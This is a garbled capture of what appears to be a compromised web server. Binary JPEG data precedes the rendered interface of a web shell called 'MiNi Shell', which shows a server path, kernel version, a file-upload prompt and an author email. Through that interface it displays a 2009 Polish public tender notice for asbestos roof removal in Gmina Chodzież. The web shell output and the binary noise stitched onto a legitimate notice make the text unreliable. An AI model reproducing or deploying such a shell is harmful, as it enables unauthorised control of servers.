JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/97058-N-2009.html

<p class="kh_header"><b>Chodzież: Demontaż i utylizacja płyt azbestowo-cementowych 2009-2011</b><br>
<b>Numer ogłoszenia: 97058 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chodzież , ul. Notecka 28, 64-800 Chodzież, woj. wielkopolskie, tel. (0-67) 2821-608, faks (0-67) 2821-608.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminachodziez.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Demontaż i utylizacja płyt azbestowo-cementowych 2009-2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: Demontaż i transport z przekazaniem do utylizacji na składowisko odpadów niebezpiecznych  pokryć dachowych zawierających azbest .
Zamówienie będzie realizowane  w miarę otrzymywanych zgłoszeń . W danym roku gmina przeznacza na to 40 tyś zł , zastrzegając sobie mniejszą kwotę , która uzależniona będzie od aktualnych potrzeb rynkowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać wykonawcy, którzy spełniają warunki określone  w art. 22 ust. 1 ustawy  Prawa zamówień publicznych:
-  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień, 
-  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania  zamówienia,
- w zakresie doświadczenia wymagane jest wykazanie zrealizowania w okresie ostatnich pięciu  lat minimum 2 robót  polegających na wykonaniu przedmiotu zamówienia.
- w zakresie osób zdolnych do wykonania zamówienia wymagane jest wykazanie minimum  1 osoby  posiadającej uprawnienia do kierowania robotami budowlanymi w  specjalności  usług  budowlanych 
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
-nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2  Prawa zamówień publicznych.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt  VI. SIWZ,  wg formuły spełnia - nie spełnia.
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawca  obowiązany  jest  dołączyć  do  o f e r t y  ( wzór formularza oferty    
   -  wg  zał.  nr 1 do  SIWZ),  następujące dokumenty:

   1)   Oświadczenie   Wykonawcy   o  spełnianiu  warunków  określonych w  art. 22  ust. 1  ustawy Prawo zamówień publicznych (wzór  formularza - zał. nr 2 do SIWZ).

   2)   Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie  art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (wzór formularza - zał. nr  3 do SIWZ).  

   3) Wykaz  wykonanych  w ciągu ostatnich  pięciu lat  robót będących przedmiotem zamówienia ,  a jeżeli  okres  prowadzenia działalności jest krótszy, to za taki okres za jaki  działalność jest  prowadzona, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym  przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca realizacji  (wzór formularza -   zał.  nr 4  do SIWZ). )
	
    4)  Dokumenty np. referencje, opinie od poprzednich zamawiających potwierdzające, że każde zadanie podane przez Wykonawcę w formularzu nr 4  zostało wykonane z należytą starannością a  ponadto wskazane jest aby dane z tych dokumentów  były tożsame z danymi z formularza nr 4 w zakresie nazwy zadania,  rodzaju   wykonanej  nawierzchni,  ilości wybudowanej powierzchni i wartości  zadania. 
Brak w/w dokumentu dla zadania wskazanego w formularzu nr 4 spowoduje wykluczenie tego zadania tj. nie  zostanie ono uznane jako zadanie spełniające warunki  SIWZ.    
 5)   Kosztorys ofertowy  -  zał. Nr  5,

 6)  Aktualny odpis  z  właściwego  rejestru  albo  zaświadczenie o wpisie do  ewidencji działalności  gospodarczej,  jeżeli odrębne  przepisy wymagają wpisu  do  rejestru   lub  zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej  niż 6 miesięcy przed upływem terminu składania (lub dokument potwierdzony w tym terminie przez organ wydający).

  7) zaświadczenie z właściwego urzędu skarbowego potwierdzające, że    wykonawca nie zalega  z opłacaniem  podatków lub  zaświadczenie, że uzyskał  zgodę  na  zwolnienie,   odroczenie   lub  rozłożenie  na  raty  zaległych  płatności , lub  wstrzymanie  w  całości wykonania  decyzji  organu  podatkowego,  wystawione  nie  wcześniej  niż 3  miesiące przed upływem terminu składania ofert.

   8)  Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie,  odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w  całości  wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3  miesiące przed upływem terminu  składania ofert.

2.W przypadku składania oferty przez podmioty  występujące wspólnie, oświadczenia i dokumenty  wskazane w  pkt 1 p.pkt 1,2,6, 7,8  muszą być złożone przez każdy podmiot w  tym też podmiot uprawniony do reprezentacji (lidera), pozostałe dokumenty  tylko  przez  lidera. 

3.Zaleca się aby wszystkie załączniki do oferty były złożone wg  kolejności  podanej  w  ofercie.

4.  Dokumenty  składane   są  w   formie   oryginału  lub  kserokopii  poświadczonej    za zgodność z oryginałem przez Wykonawcę.

5.  Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu  wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.

6.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej do składania dokumentów o których mowa wyżej stosuje się odpowiednio przepisy zawarte w § 2 rozporządzenia Prezesa Rady Ministrów z dn. 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2006 r. Nr 87 poz. 605)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminachodziez.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 64-800 Chodzież ul. Notecka 28.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 10:00, miejsce: Urząd Gminy Chodzież ul. Notecka 28  biuro nr 10 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com